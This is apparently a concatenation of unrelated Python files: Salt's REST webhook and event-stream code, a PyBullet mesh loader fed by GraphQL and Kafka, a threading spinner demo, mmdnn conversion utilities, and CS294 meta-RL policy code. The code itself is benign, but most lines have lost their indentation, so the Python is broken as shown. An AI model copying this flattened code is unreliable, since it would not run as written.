event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
                data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- 'curl -sS http://saltapi-url.example.com:8000/hook/travis/build/success -d branch="${TRAVIS_BRANCH}" -d commit="${TRAVIS_COMMIT}"'
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request**::
% curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``http://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                    revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'events': Events,
'stats': Stats,
}
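    # The keys above become URL path segments via _setattr_url_map(), e.g.
    # Login is served at /login, Jobs at /jobs/(jid) and Minions at
    # /minions/(mid); 'index' handles the root URL (/).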
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
                'server.socket_queue_size': self.apiopts.get(
                    'socket_queue_size', self.apiopts.get('queue_size', 30)),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
mesh.py
|
import os
import stat
import math
import time
import yaml
import json
import random
import urllib.request
import shutil
import logging
import argparse
import threading
from urllib.error import HTTPError
from http.client import InvalidURL
from graphqlclient import GraphQLClient
from kafka import KafkaProducer, KafkaConsumer
from .graphql import getCurrentGeometry
class MeshLoader():
"""
Loads Mesh Data into a PyBullet environment
Can refetch mesh data periodically
"""
def __init__(self, config):
self.robots = {}
self.subscription_ids = []
self.building_id = config["building_id"]
self.geometry_endpoint = config["Geometry"]["host"]
self.graphql_client = GraphQLClient(config["API"]["host"])
self.token = config["API"]["token"]
self.kafka_endpoint = config["Kafka"]["host"]
self.kafka_client = None
self.robot_positions = {}
self.threads = []
def __del__(self):
"""Stop all the threads"""
for t in self.threads:
t.join()
def fetch(self):
result = self._get_current_geometry(backoff=10, nfailures=5)
result = json.loads(result)
geometry = []
if result['data']['meshesOfBuilding'] is None:
raise ValueError("Geometry API returned bad geometry data")
for mesh in result['data']['meshesOfBuilding']:
logging.debug('Loading {}'.format(mesh['name']))
directory = mesh['geometry']['directory']
filename = mesh['geometry']['filename']
# Hack to avoid None errors
if mesh["type"]=="robot":
filename = "turtlebot.obj"
directory = "./geometry/robots/turtlebot2/"
# End hack
            if directory is None:
                raise ValueError("Could not load {}: Directory was invalid".format(mesh['name']))
            if filename is None:
                raise ValueError("Could not load {}: Filename was invalid".format(mesh['name']))
# PyBullet can not load GLTF
if mesh['geometry']['filetype'] in ['gltf', 'glb']:
filename = filename.replace('.glb','.dae')
filename = filename.replace('.gltf','.dae')
relative_url = os.path.join(directory, filename)
relative_url = relative_url.strip('./')
position = self._convert_position(mesh)
name = mesh['name']
url = os.path.join(self.geometry_endpoint, relative_url)
fp = os.path.join('/tmp/', relative_url)
try:
print("Downloading",url,fp)
self._download_geometry_resource(url, fp)
except HTTPError as e:
logging.error("Could not load {}:\n{}".format(name, e))
continue
except InvalidURL as e:
logging.error("Could not load {}:\n{}".format(name, e))
continue
except Exception as e:
print(e)
geometry.append({
'id': mesh['id'],
'name': name,
'type': mesh['type'],
'scale': mesh['scale'],
'mesh_path': fp,
'position': position,
'is_stationary': mesh['physics']['stationary'],
'is_simulated': mesh['physics']['simulated'],
'orientation': mesh['theta'],
})
return geometry
def cached(self, max_age=120):
"""
Return the cached (potentially old) geometry data
@max_age: The maximum age to cache this data (in seconds)
"""
pathname = '/tmp/geometry_cache.json'
if os.path.exists(pathname):
age = time.time() - os.stat(pathname)[stat.ST_MTIME]
if age < max_age:
logging.warn("Returning cached geometry from {0:.1f}s ago".format(age))
with open(pathname) as fp:
try:
return json.load(fp)
except json.decoder.JSONDecodeError:
logging.warn("Invalid geometry cache file")
geometry = self.fetch()
with open(pathname,'w') as fp:
json.dump(geometry, fp)
return geometry
def _convert_position(self, position):
"""
Convert the position from GraphQL form to PyBullet
"""
return [
position['x'],
position['z'],
position['y']
]
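    # Note: the y and z components are swapped above, presumably because the
    # GraphQL geometry data is y-up while the PyBullet scene is z-up.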
def _get_current_geometry(self, backoff=10, nfailures=5):
"""
Fetch the current geometry resource
Supports exponential backoff
@backoff: Time to wait before trying again
        @nfailures: Number of failures before throwing an error
"""
for i in range(nfailures):
try:
params = {"building_id": self.building_id}
return self.graphql_client.execute(getCurrentGeometry, params)
except HTTPError:
                wait = backoff*1.5**i + backoff*random.random()
                logging.warning("Geometry request failed. Trying again in %i seconds" % wait)
                time.sleep(wait)
# Try one last time and let any errors throw
return self.graphql_client.execute(getCurrentGeometry)
def _download_geometry_resource(self, url, local_filepath):
"""
Download the file from `url` and save it locally under `file_name`
"""
if os.path.exists(local_filepath):
logging.debug("Defaulting to cached file {}".format(local_filepath))
return
logging.debug("{} -> {}".format(url, local_filepath))
os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
with urllib.request.urlopen(url) as response, open(local_filepath, 'wb') as out_file:
shutil.copyfileobj(response, out_file)
def subscribe_robot_position(self):
"""
Setup subscription to robot positions
Must be called before getting robot position
"""
args = (self.robot_positions, self.kafka_endpoint)
t = threading.Thread(target=kafka_robot_worker, args=args)
t.start()
self.threads.append(t)
def get_robot_position(self, robot_id):
"""
Return the last seen position of this robot
Uses Kafka to minimize latency
"""
if robot_id in self.robot_positions:
return self.robot_positions[robot_id]
return None
def kafka_robot_worker(robot_positions, kafka_endpoint):
topic = "robot.events.odom"
# KafkaConsumer(topic, ...) already subscribes to the topic, so no extra subscribe() call is needed
kafka_consumer = KafkaConsumer(topic, bootstrap_servers=kafka_endpoint)
for msg in kafka_consumer:
command = json.loads(msg.value)
robot_id = command["robot"]["id"]
position = command["pose"]["pose"]["position"].values()
orientation = command["pose"]["pose"]["orientation"].values()
robot_positions[robot_id] = {
"position": list(position),
"orientation": list(orientation),
}
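# Illustrative sketch (never called by the worker): the odometry payload shape that
# kafka_robot_worker() above assumes. The concrete values and robot id are made up;
# only the field names ("robot"/"id", "pose"/"pose"/"position"/"orientation") come
# from the parsing code above.
def _demo_robot_position_payload():
    robot_positions = {}
    fake_msg_value = json.dumps({
        "robot": {"id": "robot-1"},
        "pose": {"pose": {
            "position": {"x": 1.0, "y": 2.0, "z": 0.0},
            "orientation": {"x": 0.0, "y": 0.0, "z": 0.0, "w": 1.0},
        }},
    })
    command = json.loads(fake_msg_value)
    robot_positions[command["robot"]["id"]] = {
        "position": list(command["pose"]["pose"]["position"].values()),
        "orientation": list(command["pose"]["pose"]["orientation"].values()),
    }
    assert robot_positions["robot-1"]["position"] == [1.0, 2.0, 0.0]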
|
spinner_thread.py
|
"""
Des:python asyncio_18 线程实现
Date: 2021.05.17
"""
# 线程实现
import os
import sys
import time
import threading
from itertools import cycle
class Signal:
    done = False
def thinking():
    time.sleep(3)
    return 42
def print_think(msg, signal):
    for i in cycle('- \\ | / '):
        status = i + " " + msg
        sys.stdout.write(status)
        sys.stdout.flush()
        sys.stdout.write('\x08' * len(status))
        time.sleep(.2)
        if signal.done:
            break
    sys.stdout.write(' ' * len(status) + '\x08' * len(status))
def supervisor():
    signal = Signal()
    spinner = threading.Thread(target=print_think, args=('thinking', signal))
    print("spinner obj", spinner)
    spinner.start()
    result = thinking()
    signal.done = True
    spinner.join()
    return result
if __name__ == '__main__':
result = supervisor()
print("Answer =", result)
|
utils.py
|
#----------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#----------------------------------------------------------------------------------------------
from __future__ import division
import os
import sys
import numpy as np
from six import text_type, binary_type, integer_types
import mmdnn.conversion.common.IR.graph_pb2 as graph_pb2
__all__ = ["assign_IRnode_values", "convert_onnx_pad_to_tf", 'convert_tf_pad_to_onnx',
'compute_tf_same_padding', 'is_valid_padding', 'download_file',
'shape_to_list', 'list_to_shape']
def assign_attr_value(attr, val):
    '''Assign value to AttrValue proto according to data type.'''
    from mmdnn.conversion.common.IR.graph_pb2 import TensorShape
if isinstance(val, bool):
attr.b = val
elif isinstance(val, integer_types):
attr.i = val
elif isinstance(val, float):
attr.f = val
elif isinstance(val, binary_type) or isinstance(val, text_type):
if hasattr(val, 'encode'):
val = val.encode()
attr.s = val
elif isinstance(val, TensorShape):
attr.shape.MergeFromString(val.SerializeToString())
elif isinstance(val, list):
if not val: return
if isinstance(val[0], integer_types):
attr.list.i.extend(val)
elif isinstance(val[0], TensorShape):
attr.list.shape.extend(val)
elif isinstance(val[0], float):
attr.list.f.extend(val)
else:
raise NotImplementedError('AttrValue cannot be of list[{}].'.format(val[0]))
elif isinstance(val, np.ndarray):
assign_attr_value(attr, val.tolist())
else:
raise NotImplementedError('AttrValue cannot be of %s' % type(val))
def assign_IRnode_values(IR_node, val_dict):
for name, val in val_dict.items():
assign_attr_value(IR_node.attr[name], val)
# For padding
def convert_tf_pad_to_onnx(pads):
pads = np.reshape(pads, -1).tolist()
dims = len(pads)
assert dims % 2 == 0
ret = []
for idx in range(0, dims, 2):
ret.append(pads[idx])
for idx in range(1, dims, 2):
ret.append(pads[idx])
return ret
def convert_onnx_pad_to_tf(pads):
return np.transpose(np.array(pads).reshape([2, -1])).reshape(-1, 2).tolist()
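# Illustrative sketch (not used by the converter): how the two pad layouts relate.
# TensorFlow-style pads are per-dimension [begin, end] pairs; ONNX-style pads list
# all begins first, then all ends. The values below are arbitrary.
def _demo_pad_layouts():
    tf_pads = [[0, 0], [1, 2], [3, 4], [0, 0]]
    onnx_pads = convert_tf_pad_to_onnx(tf_pads)
    assert onnx_pads == [0, 1, 3, 0, 0, 2, 4, 0]
    # and the conversion is reversible
    assert convert_onnx_pad_to_tf(onnx_pads) == tf_pads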
def is_valid_padding(pads):
return sum(np.reshape(pads, -1)) == 0
def shape_to_list(shape):
return [dim.size for dim in shape.dim]
def list_to_shape(shape):
ret = graph_pb2.TensorShape()
for dim in shape:
new_dim = ret.dim.add()
new_dim.size = dim
return ret
def compute_tf_same_padding(input_shape, kernel_shape, strides, data_format='NHWC'):
""" Convert [SAME] padding in tensorflow, keras to onnx pads,
i.e. [x1_begin, x2_begin...x1_end, x2_end,...] """
# print (input_shape)
# print (kernel_shape)
# print (strides)
if data_format.startswith('NC'):
# Not tested
input_shape = input_shape[2:]
remove_dim = len(strides) - len(input_shape)
if remove_dim > 0:
strides = strides[remove_dim::]
else:
input_shape = input_shape[1:-1]
remove_dim = len(input_shape) - len(strides) + 1
if remove_dim < 0:
strides = strides[1:remove_dim]
# print (input_shape)
# print (kernel_shape)
# print (strides)
up_list = [0]
down_list = [0]
for idx in range(0, len(input_shape)):
# kernel_shape[idx] = (kernel_shape[idx] - 1) * dilation_rate + 1
output_shape = (input_shape[idx] + strides[idx] - 1) // strides[idx]
this_padding = (output_shape - 1) * strides[idx] + kernel_shape[idx] - input_shape[idx]
this_padding = max(0, this_padding)
up_list.append(this_padding // 2)
down_list.append(this_padding - this_padding // 2)
# print ([0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0])
# print ('-----------------------------------------------------')
return [0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0]
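# Quick sanity check (not exercised by the converter, values computed by hand): a 7x7
# NHWC input with a 3x3 kernel and stride 2 needs one pixel of SAME padding on every
# spatial side, with the batch and channel axes left at zero in the ONNX layout
# [x1_begin, x2_begin, ..., x1_end, x2_end, ...].
def _demo_same_padding():
    pads = compute_tf_same_padding([1, 7, 7, 3], [3, 3], [1, 2, 2, 1])
    assert pads == [0, 1, 1, 0, 0, 1, 1, 0]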
# network library
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def _progress_check(count, block_size, total_size):
read_size = count * block_size
read_size_str = sizeof_fmt(read_size)
if total_size > 0:
percent = int(count * block_size * 100 / total_size)
percent = min(percent, 100)
sys.stdout.write("\rprogress: {} downloaded, {}%.".format(read_size_str, percent))
if read_size >= total_size:
sys.stderr.write("\n")
else:
sys.stdout.write("\rprogress: {} downloaded.".format(read_size_str))
sys.stdout.flush()
def _single_thread_download(url, file_name):
from six.moves import urllib
result, _ = urllib.request.urlretrieve(url, file_name, _progress_check)
return result
def _downloader(start, end, url, filename):
import requests
headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
var = fp.tell()
fp.write(r.content)
def _multi_thread_download(url, file_name, file_size, thread_count):
import threading
fp = open(file_name, "wb")
fp.truncate(file_size)
fp.close()
part = file_size // thread_count
for i in range(thread_count):
start = part * i
if i == thread_count - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=_downloader, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})
t.daemon = True
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
return file_name
def download_file(url, directory='./', local_fname=None, force_write=False, auto_unzip=False, compre_type=''):
"""Download the data from source url, unless it's already here.
Args:
filename: string, name of the file in the directory.
work_directory: string, path to working directory.
source_url: url to download from if file doesn't exist.
Returns:
Path to resulting file.
"""
if not os.path.isdir(directory):
os.mkdir(directory)
if not local_fname:
k = url.rfind('/')
local_fname = url[k + 1:]
local_fname = os.path.join(directory, local_fname)
if os.path.exists(local_fname) and not force_write:
print ("File [{}] existed!".format(local_fname))
return local_fname
else:
print ("Downloading file [{}] from [{}]".format(local_fname, url))
try:
import wget
ret = wget.download(url, local_fname)
print ("")
except Exception:
ret = _single_thread_download(url, local_fname)
if auto_unzip:
if ret.endswith(".tar.gz") or ret.endswith(".tgz"):
try:
import tarfile
tar = tarfile.open(ret)
tar.extractall(directory)
tar.close()
except Exception:
print("Unzip file [{}] failed.".format(ret))
elif ret.endswith('.zip'):
try:
import zipfile
zip_ref = zipfile.ZipFile(ret, 'r')
zip_ref.extractall(directory)
zip_ref.close()
except Exception:
print("Unzip file [{}] failed.".format(ret))
return ret
"""
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
return _multi_thread_download(url, local_fname, file_size, 5)
except:
# not support multi-threads download
return _single_thread_download(url, local_fname)
return result
"""
|
train_policy.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
Adapted for use in CS294-112 Fall 2018 HW5 by Kate Rakelly and Michael Chang
"""
import numpy as np
import pdb
import random
import pickle
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from replay_buffer import ReplayBuffer, PPOReplayBuffer
from point_mass import PointEnv
from point_mass_observed import ObservedPointEnv
#============================================================================================#
# Utilities
#============================================================================================#
def minimize_and_clip(optimizer, objective, var_list, clip_val=10):
"""
minimize `objective` using `optimizer` w.r.t. variables in
`var_list` while ensuring the norm of the gradients for each
variable is clipped to `clip_val`
"""
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return optimizer.apply_gradients(gradients)
def build_mlp(x, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a feedforward neural network
arguments:
x: placeholder variable for the state (batch_size, input_size)
regularizer: regularization for weights
(see `build_policy()` for rest)
returns:
output placeholder of the network (the result of a forward pass)
"""
i = 0
for i in range(n_layers):
x = tf.layers.dense(inputs=x,units=size, activation=activation, name='fc{}'.format(i), kernel_regularizer=regularizer, bias_regularizer=regularizer)
x = tf.layers.dense(inputs=x, units=output_size, activation=output_activation, name='fc{}'.format(i + 1), kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def build_rnn(x, h, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a gated recurrent neural network
inputs are first embedded by an MLP then passed to a GRU cell
make MLP layers with `size` number of units
make the GRU with `output_size` number of units
use `activation` as the activation function for both MLP and GRU
arguments:
(see `build_policy()`)
hint: use `build_mlp()`
"""
#====================================================================================#
# ----------PROBLEM 2----------
#====================================================================================#
# YOUR CODE HERE
with tf.variable_scope(scope):
mlp = build_mlp(x, output_size, scope, n_layers, size, activation, output_activation, regularizer)
gru = tf.nn.rnn_cell.GRUCell(num_units=output_size, activation=activation) #.build(inputs_shape=(None, output_size))
x, hidden_state = tf.nn.dynamic_rnn(cell=gru, inputs=mlp, dtype=tf.float32, initial_state=h)
x = x[:, -1, :]
return x,hidden_state
# with tf.variable_scope(scope):
# mlp = build_mlp(x, x.get_shape()[-1], scope, n_layers, size, activation, output_activation, regularizer)
# gru = tf.nn.rnn_cell.GRUCell(num_units=h.shape[1], activation=activation).build(inputs_shape=(h.shape[0], ))
# x, hidden_state = tf.nn.dynamic_rnn(cell=gru, input=mlp, dtype=tf.float32, initial_state=h)
# x = x[:, -1, :]
# return x,hidden_state
#gru_cell = tf.nn.rnn_cell.GRUCell(num_units=h.shape[1], activation=activation).build(inputs_shape=(h.shape[0], ))
# tf.nn.dynamic_rnn(ce)
# x = build_mlp(x, output_size=output_size, scope=scope, n_layers=n_layers, size=size, activation=activation, output_activation=output_activation, regularizer=regularizer)
def build_policy(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None):
"""
build recurrent policy
arguments:
x: placeholder variable for the input, which has dimension (batch_size, history, input_size)
h: placeholder variable for the hidden state, which has dimension (batch_size, gru_size)
output_size: size of the output layer, same as action dimension
scope: variable scope of the network
n_layers: number of hidden layers (not counting recurrent units)
size: dimension of the hidden layer in the encoder
gru_size: dimension of the recurrent hidden state if there is one
recurrent: if the network should be recurrent or feedforward
activation: activation of the hidden layers
output_activation: activation of the output layers
returns:
output placeholder of the network (the result of a forward pass)
n.b. we predict both the mean and std of the gaussian policy, and we don't want the std to start off too large
initialize the last layer of the policy with a Gaussian init of mean 0 and std 0.01
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=activation)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation, kernel_initializer=tf.initializers.truncated_normal(mean=0.0, stddev=0.01), bias_initializer=tf.zeros_initializer(), name='decoder')
return x, h
def build_critic(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None, regularizer=None):
"""
build recurrent critic
arguments:
regularizer: regularization for weights
(see `build_policy()` for rest)
n.b. the policy and critic should not share weights
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation, regularizer=regularizer)
x = tf.layers.dense(x, output_size, activation=output_activation, name='decoder', kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def pathlength(path):
return len(path["reward"])
def discounted_return(reward, gamma):
discounts = gamma**np.arange(len(reward))
return sum(discounts * reward)
def discount_cumsum(x, discount):
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
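# Illustrative sketch (not called by the training loop): the lfilter call above is a
# vectorized form of the backward recursion y[t] = x[t] + discount * y[t+1].
def _demo_discount_cumsum():
    x = np.array([1.0, 1.0, 1.0])
    expected = np.array([1.75, 1.5, 1.0])  # computed by hand for discount=0.5
    assert np.allclose(discount_cumsum(x, 0.5), expected)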
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.task_dim = computation_graph_args['task_dim']
self.reward_dim = 1
self.terminal_dim = 1
self.meta_ob_dim = self.ob_dim + self.ac_dim + self.reward_dim + self.terminal_dim
self.scope = 'continuous_logits'
self.size = computation_graph_args['size']
self.gru_size = computation_graph_args['gru_size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.history = computation_graph_args['history']
self.num_value_iters = computation_graph_args['num_value_iters']
self.l2reg = computation_graph_args['l2reg']
self.recurrent = computation_graph_args['recurrent']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.nn_critic = estimate_return_args['nn_critic']
self.normalize_advantages = estimate_return_args['normalize_advantages']
self.replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.val_replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
placeholders for batch observations / actions / advantages in the policy gradient
loss function.
see Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for meta-observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
sy_hidden: placeholder for RNN hidden state
(PPO stuff)
sy_lp_n: placeholder for pre-computed log-probs
sy_fixed_lp_n: placeholder for pre-computed old log-probs
"""
sy_ob_no = tf.placeholder(shape=[None, self.history, self.meta_ob_dim], name="ob", dtype=tf.float32)
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
sy_hidden = tf.placeholder(shape=[None, self.gru_size], name="hidden", dtype=tf.float32)
sy_lp_n = tf.placeholder(shape=[None], name="logprob", dtype=tf.float32)
sy_fixed_lp_n = tf.placeholder(shape=[None], name="fixed_logprob", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n, sy_hidden, sy_lp_n, sy_fixed_lp_n
def policy_forward_pass(self, sy_ob_no, sy_hidden):
"""
constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.history, self.meta_ob_dim)
